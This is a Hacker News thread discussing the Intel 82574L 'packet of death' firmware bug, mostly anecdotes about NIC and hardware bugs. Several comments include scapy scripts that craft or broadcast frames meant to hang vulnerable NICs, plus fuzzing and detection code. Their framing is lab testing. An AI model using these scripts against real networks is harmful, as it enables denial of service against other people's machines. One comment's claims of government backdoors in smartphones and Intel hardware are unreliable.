<i>That</i> is great HN content!<p>Debugging deep down the rabbit hole until you find a bug in the NIC EEPROM - and the disbelief many show when hearing that a software-generated message can bring down a NIC.<p>I for one would enjoy reading more content like this on HN than what qualifies, at best, as a Friday-night hack.
Makes me wonder if this is related to in-band management? One of the interesting things about working at NetApp, which had its own "OS", was that every driver was written by engineering. That allowed the full challenge of some of these devices to be experienced first hand.<p>One of the more painful summers resulted from a QLogic HBA which sometimes, for no apparent reason, injected a string of hex digits into the data it transmitted. There is a commemorative t-shirt of that bug with just the string of characters. It led NetApp to put in-block checksums into the file system so that corruption between the disk and memory, which was 'self inflicted' (and so passed various channel integrity checks), could be detected.<p>Here at Blekko we had a packet fragment that would simply vanish into the center switch. It would go in and never come out. We never got a satisfactory answer for that one. Keith, our chief architect, worked around it by randomizing the packet on a retransmit request.<p>The amount of code between your data and you that you can't control is, sadly, way larger than you would probably like.
I ran into a similar problem with an Intel motherboard about 10 years ago.<p>We had problems where some NFS traffic would end up getting stalled. Our NFS server would use UDP packets larger than the MTU and they would end up getting fragmented.<p>It turns out the NIC would not look at the fragmentation headers of the IP packet and would always assume a UDP header was present. From time to time, the payload of the NFS packet would contain user data that matched the UDP port number the NIC scans for to determine if the packet should be forwarded to the BMC. This motherboard had no BMC, but it was configured as if it did.<p>It would time out after a second or so, but in the meantime it dropped a bunch of packets. The NFS server would retransmit the packet, but since the payload didn't change, the NIC would reliably drop the rest of the fragments.<p>Of course Intel claimed it wasn't their bug ("it's a bug in the Linux NFS implementation"), but they quickly changed their tune when I coded up a sample program that sent one packet a second and reliably caused the NIC to drop 99% of packets received.<p>While it turned out to be a fairly lame implementation problem on Intel's part (both ignoring the fragmentation headers and the poor implementation of the motherboard), I have to say it was very satisfying to solve the mystery.
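A minimal sketch of that kind of reproduction (not the commenter's actual program), assuming scapy, a disposable lab target, and that the NIC matches on UDP port 623 (the standard RMCP/IPMI port - the real port isn't given above):<p><pre><code>import struct, time
from scapy.all import IP, UDP, Raw, fragment, send

TARGET = "192.168.1.50"   # hypothetical victim behind the buggy NIC
BMC_PORT = 623            # assumed management port the NIC filters on

# Oversized UDP datagram so the IP layer must fragment it. Bytes that look
# like a fresh UDP header (dst port = BMC_PORT) are placed exactly where the
# second fragment's data begins, where a NIC that ignores the fragment
# offset might misread them as a real UDP header.
fake_udp_header = struct.pack("!HHHH", 12345, BMC_PORT, 8, 0)
payload = b"A" * 1472 + fake_udp_header + b"B" * 200

pkt = IP(dst=TARGET) / UDP(sport=2049, dport=2049) / Raw(load=payload)
for frag in fragment(pkt, fragsize=1480):   # first fragment = UDP hdr + 1472 bytes
    send(frag, verbose=False)
time.sleep(1)   # the comment reports one such packet per second was enough</code></pre>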
I've always had mixed emotions about NICs that have hardware-assisted offload features. I welcome the decrease in CPU utilization and increased throughput, but the NIC ends up being a complex system that very subtle bugs can lurk inside, versus being a simple I/O device that a kernel driver controls.<p>If there's a denial of service hiding in there, I wonder what other security bugs might be lurking. It's scary stuff, and pretty much impossible to audit yourself.<p>Edit:<p>Also, I'm a little freaked out that the EEPROM on the NIC can be modified easily with ethtool. I would have hoped for some signature verification. I guess I'm hoping for too much.<p>Edit 2:<p>I wonder if this isn't the same issue described here: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=632650" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=632650</a>
Very good detective work. However, a small suggestion, given:<p><i>I’ve been working with networks for over 15 years and I’ve never seen anything like this. I doubt I’ll ever see anything like it again.</i><p>This is an excellent case for fuzz testing. My thinking is that you get your Ruby, EventMachine, and Redis going and run a constant fuzz with all sorts of packets in your pre-shipping lab (a sketch of the idea follows below).<p>The idea is that you <i>want</i> to create the condition where you do see it, along with the other handful of lockups that are there that you haven't yet seen.
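A bare-bones version of that loop, in Python rather than the Ruby/EventMachine/Redis stack mentioned above (a sketch only, assuming scapy and a lab machine you can afford to knock over):<p><pre><code>import os, random
from scapy.all import IP, ICMP, UDP, Raw, send, sr1

TARGET = "192.168.1.50"   # hypothetical lab box with the NIC under test

for i in range(100000):
    # spray frames with random ports, sizes and payloads
    pkt = IP(dst=TARGET) / UDP(dport=random.randint(1, 65535)) \
          / Raw(load=os.urandom(random.randint(64, 1400)))
    send(pkt, verbose=False)
    # every 1000 packets, check the target still answers pings
    if i % 1000 == 0 and sr1(IP(dst=TARGET) / ICMP(), timeout=2, verbose=False) is None:
        print("target stopped responding after ~%d packets" % i)
        break</code></pre>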
Fantastic article, fantastic find. Well done.<p>As a telecoms engineer predominantly selling Asterisk for the last 4 years, with Asterisk experience extending back to 2006, it's shocking to see this finally put right. For so many years I have avoided the e1000 Intel controllers, after a very public/embarrassing situation when a conferencing server behaved in a weird manner, disrupting core services. Not having the expertise the author has, I narrowed it down to the ethernet controller, immediately replaced the server with IBM hardware with a Broadcom chipset, and resumed our services providing conferencing to some of the top FTSE100 companies.<p>Following this episode, I spent numerous days diagnosing the chipset, with many conference calls with Digium engineers debugging the server remotely. In the end: no solution, a recommendation to avoid the e1000 chipset, and we moved on.
As someone who works with FPGAs/ASICs, this isn't that weird.<p>Everything gets serialized/deserialized these days, so there are all kinds of boundary conditions where you can flip just the right bit and get the data to be deserialized the wrong way.<p>What's more interesting is that it bypasses all of the checks meant to prevent this from happening.<p>Here is the wiki page on the INVITE OF DEATH, which sounds like the problem you hit:<p><a href="http://en.wikipedia.org/wiki/INVITE_of_Death" rel="nofollow">http://en.wikipedia.org/wiki/INVITE_of_Death</a>
Persistent bugger.<p>"With a modified HTTP server configured to generate the data at byte value (based on headers, host, etc) you could easily configure an HTTP 200 response to contain the packet of death - and kill client machines behind firewalls!"<p>That's worrisome; I'll bet there are lots of not-so-nice guys trying to figure out a way to do just that. There must be tons of server hardware out there with these cards in them.
I've been unable to reproduce this on systems equipped with the controller in question. I'd love to see "ethtool -e ethX" output for a NIC confirmed to be vulnerable.<p>/edit Ah, I spoke too soon; the author has updated his page here with diffs between affected and unaffected EEPROMs:<p><a href="http://www.kriskinc.com/intel-pod" rel="nofollow">http://www.kriskinc.com/intel-pod</a>
Can anyone remember the source of the quote:<p><pre><code> Sometimes bug fixing simply takes two people to lock themselves in a room and nearly kill themselves for two days.
</code></pre>
Reminded me of this
So is it only the byte at 0x47f that matters? Could you just send a packet filled with 0x32 0x32 0x32 0x32 0x32 to trigger this? (Like, download a file full of 0x32s?) Or does it have to look like a SIP packet?<p>You'd think the odds of getting a packet with 0x32 in position 0x47f would be almost 1/256 per packet, so why aren't these network cards falling over everywhere every few seconds?
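One way to probe that question empirically (a sketch, assuming scapy, root, and an affected NIC on a lab machine; the offset and value come from the article, but whether a plain padded packet like this triggers it is exactly what's being asked):<p><pre><code>from scapy.all import Ether, IP, UDP, Raw, sendp

TARGET_MAC = "00:11:22:33:44:55"   # hypothetical victim MAC
TARGET_IP = "192.168.1.50"         # hypothetical victim IP

frame = Ether(dst=TARGET_MAC) / IP(dst=TARGET_IP) / UDP(sport=5060, dport=5060)
header_len = len(frame)            # Ethernet + IP + UDP headers built so far

# Pad so that byte 0x47f of the frame is 0x32 and everything else is filler.
kill_offset = 0x47F
payload = bytearray(kill_offset - header_len + 1)
payload[-1] = 0x32
sendp(frame / Raw(load=bytes(payload)), verbose=False)
# Then check whether the victim's link drops. Per the article, the bytes
# before the magic offset also matter, so the filler choice may change the result.</code></pre>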
Before actually testing this with the real payload, is there a better way of determining if you have a potentially vulnerable driver than something like this?<p><pre><code> # awk '/eth/ { print $1 }' <(ifconfig -a) | cut -d':' -f1 | uniq | while read interface; do echo -n "$interface "; ethtool -i $interface | grep driver; done
eth0 driver: e1000e
eth1 driver: e1000e</code></pre>
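A slightly more direct check than grepping driver names (a sketch assuming the Linux sysfs layout and that 8086:10d3 is the 82574L's PCI vendor/device pair - verify with "lspci -nn" before trusting it):<p><pre><code>import glob, os

SUSPECT = ("0x8086", "0x10d3")   # Intel vendor ID, assumed 82574L device ID

for dev in glob.glob("/sys/class/net/*/device"):
    iface = dev.split("/")[4]
    try:
        vendor = open(os.path.join(dev, "vendor")).read().strip()
        device = open(os.path.join(dev, "device")).read().strip()
    except OSError:
        continue
    if (vendor, device) == SUSPECT:
        print(iface, "looks like an 82574L")</code></pre>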
Intriguing.<p>The Intel 82574L ethernet controller looks to be popular, too. Intel, Supermicro, Tyan and Asus use it on multiple current motherboards - Asus notably on the WS (Workstation) variants of their consumer motherboards, e.g. the Asus P8Z77 WS (socket LGA 1155) and Asus Z9PE-D8 WS (dual CPU, socket LGA 2011).
I'm not surprised - firmware for ethernet controllers has grown quite complex, with the addition of new features that allow the hardware to do more work on behalf of the kernel.<p>Could this be a bug in the EEPROM code that handles TCP offloading, or one of the other hardware offload features that are now becoming more common? (<a href="https://en.wikipedia.org/wiki/TCP_offload_engine" rel="nofollow">https://en.wikipedia.org/wiki/TCP_offload_engine</a>)
My servers all have the affected cards (two per machine - yikes!) but so far I can't reproduce the bug (yay).<p>There are subtle differences between the offsets I get when I run "ethtool -e interface" versus those in the article that indicate an affected card (but they're quite close).<p>Mine are:<p>0x0010: ff ff ff ff 6b 02 69 83 43 10 d3 10 ff ff 58 a5<p>0x0030: c9 6c 50 31 3e 07 0b 46 84 2d 40 01 00 f0 06 07<p>0x0060: 00 01 00 40 48 13 13 40 ff ff ff ff ff ff ff ff<p>Output of "ethtool -i interface" (in case anyone wants to compare notes):<p>driver: e1000e
version: 1.5.1-k
firmware-version: 1.8-0<p>I tested both packet replays by broadcasting to all attached devices on a simple Gbit switch and no links dropped.
I had something similar in my home network, but my network-fu is not good enough and I did not have the time to debug for days and weeks.<p>Basically, one Linux box with an NVidia embedded gigabit controller could take down the whole segment. It would only happen after a random period, like after days when the box was busy. No two machines connected to the same switch would be able to ping each other any more after that. I suspected the switch, bad cables, etc. In the end I successfully circumvented the problem by buying a discrete gigabit ethernet card for the server in question.
Kielhofner is a pretty awesome guy. I met him a couple of times "back in the day" at Astricon conferences when he was hacking together Astlinux.<p>He was instrumental in taming the Soekris and Alix SBC boards of old and creating Asterisk appliances with them. If you've got a little Asterisk box running on some embedded-looking hardware somewhere, it doesn't matter whose name is on the sticker, it's got some Kielhofner in it.<p>I live about a mile from Star2Star. I ought to pop in one of these days and see what they're up to.
This seems much more serious than the much-ballyhooed Pentium FDIV bug. Hopefully Intel will be on the ball with notifying people and distributing the fix.
Cool!<p>I'm currently working on an open source project where we are chasing "hang really hard and need a reboot to come back" issues with <i>exactly</i> this same ethernet controller, the Intel 82574L. I wonder if it's related!<p>Our Github issue: <a href="https://github.com/SnabbCo/snabbswitch/issues/39" rel="nofollow">https://github.com/SnabbCo/snabbswitch/issues/39</a>
Well, this hurts. I have a critical machine with a dual-NIC Intel motherboard. I had to abandon the 82579LM port because of unresolved bugs in the Linux drivers, and the other one is an 82574L, the one documented in this post.<p>I suppose I can send just the right ICMP echo packet to the router to make it send me back an inoculating frame.
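Something like this, perhaps (a sketch, assuming scapy; the inoculating byte value is an assumption here - the article describes which values at frame offset 0x47f protect rather than kill, so check it before relying on this):<p><pre><code>from scapy.all import IP, ICMP, Raw, sr1

ROUTER = "192.168.1.1"   # hypothetical upstream router
INOCULATE = 0x34         # assumed protective value - verify against the article

# An echo reply mirrors its payload, so a request padded this way should come
# back with the chosen byte at frame offset 0x47f (14 Ethernet + 20 IP +
# 8 ICMP = 42 bytes of headers before the payload).
kill_offset = 0x47F
payload = bytearray(kill_offset - 42 + 1)
payload[-1] = INOCULATE

reply = sr1(IP(dst=ROUTER) / ICMP() / Raw(load=bytes(payload)), timeout=2)
print("got a reply carrying the inoculating byte" if reply else "no reply")</code></pre>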
Reminds me of my own adventures with systems hanging on PXE boot when a Symantec Ghost PreOS Image didn't boot up completely, and went on to flood the network with packets. See <a href="http://dynamicproxy.livejournal.com/46862.html" rel="nofollow">http://dynamicproxy.livejournal.com/46862.html</a>
This somehow reminds me of the SQL Slammer worm. A single, simply formed packet caused a tsunami over the internet.<p>Personally, I am not at all surprised that this sort of thing exists. I'm sure there are lots more defects out there to be found. Turing completeness is a cruel master.
I have mixed feelings about the write-up. I think it becomes clear pretty early on that the issue is in the NIC hardware, at which point it is time to stop wasting your time investigating a problem you can't fix and start contacting the vendor.
It's like a reverse example of a broken packet... You can see a number of interesting samples and stories in the museum of broken packets: <a href="http://lcamtuf.coredump.cx/mobp/" rel="nofollow">http://lcamtuf.coredump.cx/mobp/</a>
Congrats, sir, you've just discovered the Internet kill switch!<p>The “red telephone” used to shut down the entire Internet comes to mind.<p>You've discovered how to immunize friends and kill enemies in cyberwars.<p>Do governments have an Internet kill switch? Yes - Egypt and Syria are good examples. We know China is engaged in cyberwar; they are beyond kill switches.<p>Techcrunch: <a href="http://techcrunch.com/2011/03/06/in-search-of-the-internet-kill-switch/" rel="nofollow">http://techcrunch.com/2011/03/06/in-search-of-the-internet-k...</a><p>Wiki: <a href="http://en.wikipedia.org/wiki/Internet_kill_switch" rel="nofollow">http://en.wikipedia.org/wiki/Internet_kill_switch</a><p>We know governments deploy hardware that they can control when needed. Smartphones are the best example of government-issued backdoors, next to some Intel hardware (including NICs).
The author mentioned a custom packet generator tool, "Ostinato". I met the author of this tool 2-3 months back. A lone guy working on it as a side project. Amazing work. :)
It appears to work if you send the packet to the network broadcast address. That's a quick way to detect whether any of the machines are vulnerable (they won't respond to the second ping); a scripted version of the idea is sketched below.
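A scripted version of that check (a sketch, assuming scapy, root, and a lab segment you own; "pod.bin" stands in for the packet-of-death bytes after the Ethernet header, taken from the article's capture and not reproduced here):<p><pre><code>from scapy.all import IP, ICMP, Ether, Raw, sr1, sendp

HOSTS = ["192.168.1.10", "192.168.1.11"]   # hypothetical machines to check
POD_FRAME = Ether(dst="ff:ff:ff:ff:ff:ff") / Raw(load=open("pod.bin", "rb").read())

def alive(ip):
    return sr1(IP(dst=ip) / ICMP(), timeout=2, verbose=False) is not None

before = {ip: alive(ip) for ip in HOSTS}   # first ping
sendp(POD_FRAME, verbose=False)            # broadcast the suspect frame
after = {ip: alive(ip) for ip in HOSTS}    # second ping

for ip in HOSTS:
    if before[ip] and not after[ip]:
        print(ip, "stopped responding - likely vulnerable")</code></pre>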